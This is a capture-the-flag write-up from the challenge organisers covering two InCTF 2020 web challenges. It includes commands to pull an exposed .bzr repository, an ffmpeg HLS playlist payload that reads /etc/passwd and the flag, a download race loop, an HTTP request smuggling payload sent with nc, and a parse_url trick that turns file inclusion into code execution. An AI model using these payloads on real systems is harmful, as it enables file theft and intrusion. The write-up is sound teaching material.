INCTF-WRITEUP(ADMIN)

INCTF-WRITEUP(ADMIN)

August 01, 2020

Hello everyone you’re all doing fine. Recently as a part of team bi0s we hosted our annual InCTF-International

VIDEO BAZAR -ADMIN PERSPECTIVE

In this challenge the players are welcomed with a harmless looking index.php page
which has only 1 textbox and some text saying ENTER THE SUPER SECRET KEY
The First Step is to find the hidden .bzr (Use anything like dirb gobuster dirbuster) folder and a quick google will reveal to you that
.bzr is basically a open source version control system. Basically its somewhat the same as .git

After Finding .bzr the next step would be to retrive the source code. But i couldnt find any tools to do it so u might have to manually get it

steps to follow to get source code

1
2
3
4
5
6
7
8
1. Install bzr on your system
2. mkdir inctf
3. cd inctf
4. bzr init
5. echo 'testcheck' >file
6. bzr add
7. brz commit
8. rm file

So Now u have a bzr repository with the .bzr directory
Next

1
2
3
9. cd .bzr/branch
10. rm last-revision
11. wget http://35.211.92.233:8001/.bzr/branch/last-revision

Basically we are getting and replacing our last-revision with the one on the server
We follow the same steps for dirstate and pack-names

1
2
3
4
5
6
12. cd ../checkout
13. rm dirstate
14. wget http://35.211.92.233:8001/.bzr/checkout/dirstate
15. cd ../repository
16. rm pack-names
17. wget http://35.211.92.233:8001/.bzr/repository/pack-names

So now we have all the important files which point to the commit history
Next we do a bzr check
which will spit out all the name of the missing files

then simply wget them to the approprite folder

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
cd .bzr/repository/indces/
wget http://35.211.92.233:8001/.bzr/repository/indices/f66475e1bc8c3b9c86e53a761cb536df.rix
wget http://35.211.92.233:8001/.bzr/repository/indices/86b254a3ef28b93ac82c43c31283f23b.rix
wget http://35.211.92.233:8001/.bzr/repository/indices/1035bef5d03b940a3385fccc0c082001.rix
wget http://35.211.92.233:8001/.bzr/repository/indices/f66475e1bc8c3b9c86e53a761cb536df.iix
wget http://35.211.92.233:8001/.bzr/repository/indices/86b254a3ef28b93ac82c43c31283f23b.iix
wget http://35.211.92.233:8001/.bzr/repository/indices/1035bef5d03b940a3385fccc0c082001.iix
wget http://35.211.92.233:8001/.bzr/repository/indices/f66475e1bc8c3b9c86e53a761cb536df.cix
wget http://35.211.92.233:8001/.bzr/repository/indices/86b254a3ef28b93ac82c43c31283f23b.cix
wget http://35.211.92.233:8001/.bzr/repository/indices/1035bef5d03b940a3385fccc0c082001.cix
wget http://35.211.92.233:8001/.bzr/repository/indices/f66475e1bc8c3b9c86e53a761cb536df.tix
wget http://35.211.92.233:8001/.bzr/repository/indices/86b254a3ef28b93ac82c43c31283f23b.tix
wget http://35.211.92.233:8001/.bzr/repository/indices/1035bef5d03b940a3385fccc0c082001.tix

cd ../packs
wget http://35.211.92.233:8001/.bzr/repository/packs/1035bef5d03b940a3385fccc0c082001.pack
wget http://35.211.92.233:8001/.bzr/repository/packs/86b254a3ef28b93ac82c43c31283f23b.pack
wget http://35.211.92.233:8001/.bzr/repository/packs/f66475e1bc8c3b9c86e53a761cb536df.pack

Then do
bzr status
and bzr revert
And you will have the source files of the challenge

After Getting the source files you can get the
{SUPER SECRET PASSWORD==>THIS_IS_THE_NEW_WAY_TO_DO_STUFF}

Now To the Second Part of the challenge

In the source code we see its using ffmpeg to convert the videos,
and it has ALLOW-EXTENTIONS set to all,
And if you research a bit more u will find that ffmpeg has the ability/bug that it converts txt files to video files too.
Now we need to know how HLS playlist is handled

1
2
3
1. When processing a playlist, ffmpeg links all the segment contents together and processes them as a separate file
2. Ffmpeg uses the first segment of playlist to determine the file type
3. Ffmpeg uses a special way to process files with. TXT suffix. It will try to print the contents of the file on the screen as a terminal

So basically

1
2
3
4
5
6
7
8
9
EXTM3U
EXT-X-MEDIA-SEQUENCE:0
EXTINF:1.0
GOD.txt

EXTINF:1.0
file:///etc/passwd

EXT-X-ENDLIST

Ffmpeg sees the EXTM3U tag in the GAB2 subtitle block, and confirms that the file type is HLS playlist.
Now even though the file God.txt doesnt exist name is enough for ffmpeg to detect the file type as TXT
Ffmpeg links the contents of all segments of the playlist together, because only the file / etc / passwd actually exists, so the final content is the content of the / etc / passwd file
Because the file type is TXT, ffmpeg draws a terminal to print the file.

Now file:// is blacklisted in the source code No problem
we can just direclty do /etc/passwd

So now we have file read on the system

how do we retrive the file

if you see there is a sleep statement before the deletion of the files
and the file names are always the same (md5 of the given filename)
So we can easily execute a race condition to download the file before it gets deleted

FINAL PAYLOAD FOR SECOND PART

1
2
3
4
5
6
7
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:1.0
GOD.txt
#EXTINF:1.0
/flag
#EXT-X-ENDLIST

Paste into a file with .mp4 extention (any extention will do)
convert to something
Race to download the file and read the flag

and Race condition

1
2
3
4
while 1
do
wget http://35.211.92.233:8001/upload/<FILE>.<EXTENTIOn>
done

HOPE YOU ENJOYED IT :)

REFERENCES USE TO MAKE CHALLENGE

https://ctftime.org/writeup/13380
https://www.blackhat.com/docs/us-16/materials/us-16-Ermishkin-Viral-Video-Exploiting-Ssrf-In-Video-Converters.pdf
https://developpaper.com/analysis-of-ffmpeg-arbitrary-file-reading-vulnerability/

Buggy

The original concept was Request smuggling along LFI, Lets see how
When we start the challenge, We are greeted with a login page and there is an option to register too but when we go there it says forbidden
so lets dive a bit deeper check the requests being sent
in the req we find that the server used is ATS/7.1.1. This is there first hint
A bit of searching and you will find that ATS/7.1.1 Suffers from improper checking of the content-length on an cache-hit
So we can use this to smuggle ourselves a register request to the backednd

payload

1
2
3
4
5
6
7
8
9
10
11
printf 'GET /index.html HTTP/1.1\r\n'\   
'Host: buggy.web.inctf.in\r\n'\
'Content-Length: 96\r\n'\
'\r\n'\
'GET /register.php?username=mja&password=lpa&submit=submit HTTP/1.1\r\n'\
'Host: buggy.web.inctf.in\r\n'\
'\r\n'\
'GET /index.php?echo=2 HTTP/1.1\r\n'\
'Host: buggy.web.inctf.in\r\n'\
'\r\n'\
|nc -q 1 buggy.web.inctf.in 80

So next we just login and off to the second stage
in the second part there seems to be some sort of file uploader and it allows us to upload any sort of file but it removes the extention and converts the name to md5
after uploading there is also an option to include that file
but there is a check on include such that only files with the scheme http|https are allowed
and if you try to do a rfi it doesnt allow it :P
Here we basically had to exploit parse_url to make it such that
parse_url()['scheme']=='http|https'
and include reads that file
to do this we can use a payload like http:asd../../../../../../
what this does is that it tricks parse_url such that the scheme is shown as http and the path is taken as the rest, Now what include does it it takes the whole thing as a internal path as its not in proper url format and includes the file.
Yay so now we can get rce via uploading some arbitary file with php content ie .
The flag was in config.php

FLAG

inctf{REQU357_5MUGG71NG_4ND_1NCLUD3_F0R_TH3_W1N}